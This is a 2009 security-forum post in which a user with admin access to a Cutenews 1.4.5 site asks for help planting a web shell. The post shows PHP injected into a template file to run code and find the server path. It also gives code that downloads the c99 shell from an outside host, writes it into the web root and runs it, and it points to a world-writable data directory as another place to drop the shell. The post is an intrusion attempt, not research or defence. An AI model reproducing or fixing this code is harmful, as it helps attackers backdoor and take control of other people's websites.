|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 163
Members: 0
Total: 163
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Cutenews 1.4.5 shell injection |
|
Posted: Tue Sep 15, 2009 6:10 am |
|
|
bizzumbottom |
Active user |
|
|
Joined: Sep 09, 2009 |
Posts: 27 |
|
|
|
|
|
|
|
So I got admin access, and I'm trying a lot of PHP code in the .tpl file.
First, I did:
phpinfo();
= this was just to test php parsing
Then, I did:
echo $server = $_SERVER['DOCUMENT_ROOT'];
I found out the path to the Cutenews script was: /vars/www/site.net/httpdocs/cutenews
Although this is where I'm stuck.
I'm trying to now use this code to inject a shell into the site:
Code: | $fp = fopen('/vars/www/vhosts/site.net/httpdocs/cutenews/file.php', 'w');
fwrite($fp, file_get_contents('http://site2.com/c99.txt'));
fclose($fp);
echo passthru('/var/www/vhosts/site.net/httpdocs/cutenews/file.php'); |
I then try this code to see if the newly created shell actually exists:
Code: |
$filename = '/vars/www/vhosts/site.net/httpdocs/cutenews/file.php';
if (file_exists($filename)) {
echo "The file $filename exists";
} else {
echo "The file $filename does not exist";
} |
Sure enough, "The file does not exist"
I really don't think /vars/www/vhosts is the right location, or it's just some serverside path or something. I think I should be looking for something like /home/user/public_html/cutenews
I read up that /cutenews/data directory is CHMODDED 777 so I can create a shell.php there, but I don't really know...
PLEASE HELP! |
|
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|